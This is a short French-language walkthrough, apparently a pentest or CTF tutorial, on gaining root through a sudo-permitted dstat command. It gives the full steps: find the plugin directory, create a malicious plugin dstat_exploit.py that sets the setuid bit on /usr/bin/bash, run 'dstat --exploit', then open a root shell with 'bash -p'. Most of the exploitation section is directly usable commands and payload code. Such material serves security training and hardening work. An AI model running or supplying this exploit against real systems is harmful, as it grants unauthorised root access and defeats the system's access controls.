Contexte
La commande Sudo dstat peut être vulnérable à l’élévation de privilèges (PrivEsc).
dstat
est un outil polyvalent pour générer des statistiques sur les ressources système.
Il permet aux utilisateurs de créer un plugin personnalisé et de l’exécuter en ajoutant une option, par ex. dstat –monplugin.
Enquête
La condition pour pouvoir utiliser cette exploit est de pouvoir, exécuter la commande dstat
en tant que root, ce qui va nous permettre d’accéder aux privilèges root en utilisant notre plugin malveillant.
Exploitation
Créer un nouveau plugin Dstat
Tout d’abord, recherchez le répertoire dstat
.
find / -type d -name dstat 2>/dev/null
Supposons que l’emplacement de dstat est : /usr/local/share/dstat
.
Créez un fichier appelé dstat_exploit.py
sous /usr/local/share/dstat/
.
Dans le fichier dstat_exploit.py
, saisissez la payload suivante :
import os
os.system('chmod +s /usr/bin/bash')
maintenant nous avons un plugin exploit car dans ce répertoire la nomenclature d’un plugin est la suivante : dstat_<plugin-name>.py
Pour Vérifier que le plug-in d’exploitation ci-dessus a été ajouté en exécutant la commande suivante:
dstat --list | grep exploit
(le grep c’est uniquement pour faire un flitre sur notre plugin qui est bine exploit)
Exécuter Dstat avec le plugin malveillant
Exécutez maintenant "dstat" avec l’indicateur "-exploit" (le nom de l’indicateur comme dit précédemment est déterminé par le suffixe du nom de fichier, en suivant la nomenclature dstat_<plugin-name>.py
).
/usr/bin/dstat --exploit
Le plugin d’exploit s’est exécuté donc nous entrons bash en tant que root.
bash -p